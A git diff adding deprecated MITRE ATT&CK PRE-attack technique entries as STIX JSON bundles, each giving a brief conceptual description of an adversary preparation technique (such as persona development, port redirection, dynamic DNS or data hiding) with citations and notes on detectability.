matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).\n\nOnce a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1344", + "external_id": "T1344" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1121", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The nature of social media is such that the adversary naturally connects to a target of interest without suspicion, given the purpose of the platform is to promote connections between individuals. Performing activities like typical users, but with specific intent in mind.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf.json new file mode 100644 index 0000000000000000000000000000000000000000..1dcbf738cb9fcb7bb697bfe2d17b30fbec1ef4b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--71c8d914-aacd-4248-9787-b81d81381579", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Port redirector", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).\n\nRedirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1363", + "external_id": "T1363" + }, + { + "source_name": "SecureWorks HTRAN Analysis", + "description": "JOE STEWART. (2011, August 3). HTran and the Advanced Persistent Threat. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1140", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904.json new file mode 100644 index 0000000000000000000000000000000000000000..7fce1529b9f4ef0487ceaf22f28a18544dd7e995 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--fd3fea9b-ce2c-42e8-9ef4-3e750930cc13", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Derive intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).\n\nLeadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)", + "external_references": [ + { + "external_id": "T1230", + "url": "https://attack.mitre.org/techniques/T1230", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Clyde R. Heffter. (2011, August 4). A Fresh Look at Collection Requirements. Retrieved March 2, 2017.", + "source_name": "Heffter" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1007", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3.json new file mode 100644 index 0000000000000000000000000000000000000000..e3fb512756a6f1745249a8cb31e18d1d5f5668b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--69e898b6-0b3c-44f9-ac97-d6a6d0d54ca2", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build and configure delivery systems", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).\n\nDelivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1347", + "external_id": "T1347" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is detectable once deployed to the public Internet, used for adversarial purposes, discovered, and reported to defenders.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is easy to create and burn infrastructure. Otherwise, blacklisting would be more successful for defenders.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1124", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81.json new file mode 100644 index 0000000000000000000000000000000000000000..b11cdc44e0cbb35891f0ff79ebe8434e263aaf7f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9122d69d-a21a-4859-b392-78c366583d82", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test physical access", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).\n\nAn adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1360", + "external_id": "T1360" + }, + { + "source_name": "OCIAC Pre Incident Indicators", + "description": "Orange County Intelligence Assessment Center. (n.d.). Pre-Incident Indicators. Retrieved March 28, 2017." + }, + { + "source_name": "NewsAgencySpy", + "description": "The Canadian Press. (2012, August 22). Reporter says Chinese news agency asked him to spy. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender often install badging, cameras, security guards or other detection techniques for physical security and monitoring.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires a physical presence in the space being entered and increased risk of being detected/detained (e.g., recorded on video camera)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1137", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd.json new file mode 100644 index 0000000000000000000000000000000000000000..cbf117f251f7ae3cc0b3b4cb2a71f037a1486978 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7cfff186-3c62-4f72-b3dd-81adf53bc22d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify technology usage patterns", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).\n\nTechnology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1264", + "external_id": "T1264" + }, + { + "source_name": "SANSRemoteAccess", + "description": "Jason Ragland. (2010, January 18). Remotely Accessing Sensitive Resources. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Physical observations, OSINT for remote access instructions, and other techniques are not detectable.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Determine if users work offsite, connect remotely, or other possibly less restricted/secured access techniques.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1041", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11.json new file mode 100644 index 0000000000000000000000000000000000000000..ce8163537a8aee79182abae9050dc36eb30f87e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--e2a7d2e2-ccb1-48ac-8b7a-7b487a589af3", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1308", + "external_id": "T1308" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + }, + { + "source_name": "Nemucod Facebook", + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1085", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1def484d-2343-470d-8925-88f45b5f9615.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1def484d-2343-470d-8925-88f45b5f9615.json new file mode 100644 index 0000000000000000000000000000000000000000..238b476503f7897babe53fb2d263d839fedfe8ee --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1def484d-2343-470d-8925-88f45b5f9615.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--fc9bcf83-e469-430a-80f5-fd4c447b791f", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1def484d-2343-470d-8925-88f45b5f9615", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess vulnerability of 3rd party vendors", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).\n\nOnce a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1298", + "external_id": "T1298" + }, + { + "source_name": "Zetter2015Threats", + "description": "Kim Zetter. (2015, January 4). The Biggest Security Threats We\u2019ll Face in 2015. Retrieved March 5, 2017." + }, + { + "source_name": "WSJTargetBreach", + "description": "Paul Ziobro. (2014, February 6). Target Breach Began With Contractor's Electronic Billing Link. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd parties would most likely not report network scans to their partners. Target network would not know that their 3rd party partners were being used as a vector.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "The difficult part is enumerating all 3rd parties. Finding major partners would not be difficult. Significantly easier with insider knowledge. Vulnerability scanning the 3rd party networks is trivial.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1075", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f.json new file mode 100644 index 0000000000000000000000000000000000000000..2108b7161fc5c03234a92ff63e573cf3aa13dd7e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--724a5141-de2c-42cf-9d03-46bbbb06b79d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business processes/tempo", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).\n\nUnderstanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1280", + "external_id": "T1280" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Current or previous employees may divulge information on the Internet. If insiders are used, the defender may have policies or tools in place to detect loss of this data or knowledge.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "In some cases, this requires some insider knowledge or specialized access to learn when critical operations occur in a corporation. For publicly traded US corporations, there is a lot of open source information about their financial reporting obligations (per SEC). Companies announce their annual shareholder meeting and their quarter phone calls with investors. Information such as this can help the adversary to glean certain aspects of the business processes and/or rhythm.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1057", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864.json new file mode 100644 index 0000000000000000000000000000000000000000..4215fbf3171b31ff414cffb0d8dcdd116161e734 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--1a166e8f-7475-4c76-969c-527ed66d870d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data Hiding", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).\n\nCertain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1320", + "external_id": "T1320" + }, + { + "source_name": "BotnetsDNSC2", + "description": "Christian J. Dietrich, Christian Rossow, Felix C. Freiling, Herbert Bos, Maarten van Steen, Norbert Pohlmann. (2011). On Botnets that use DNS for Command and Control. Retrieved March 6, 2017." + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + }, + { + "source_name": "DNS-Tunnel", + "description": "Alexey Shulmi and Sergey Yunakovsky. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "This technique requires a more advanced protocol understanding and testing to insert covert communication into legitimate protocol fields.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1097", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d.json new file mode 100644 index 0000000000000000000000000000000000000000..76e1644bbecbebc86053eb9ccfb3312358f1a124 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--07554274-64d0-4998-b11d-d2ceb17dcd2e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).\n\nPhysical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1282", + "external_id": "T1282" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary searches publicly available sources that list physical locations that cannot be monitored by a defender or are not necessarily monitored (e.g., all IP addresses touching their public web space listing physical locations).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Most corporations now list their locations on public facing websites. Some challenge still exists to find covert or sensitive locations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1059", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c.json new file mode 100644 index 0000000000000000000000000000000000000000..904352d73f2131e149b0b14670f1120ac4d69876 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--62b9c528-6105-4828-8405-71323614580b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).\n\nDynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1311", + "external_id": "T1311" + }, + { + "source_name": "DellMirage2012", + "description": "DELL SECUREWORKS COUNTER THREAT UNIT THREAT INTELLIGENCE. (2012, September 18). The Mirage Campaign. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context. It is possible, however, for defenders to see if the PTR record for an address is hosted by a known DDNS provider. There is potential to assign some level of risk based on this.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Flexible and re-configurable command and control servers, along with deniable ownership and reduced cost of ownership.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1088", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} 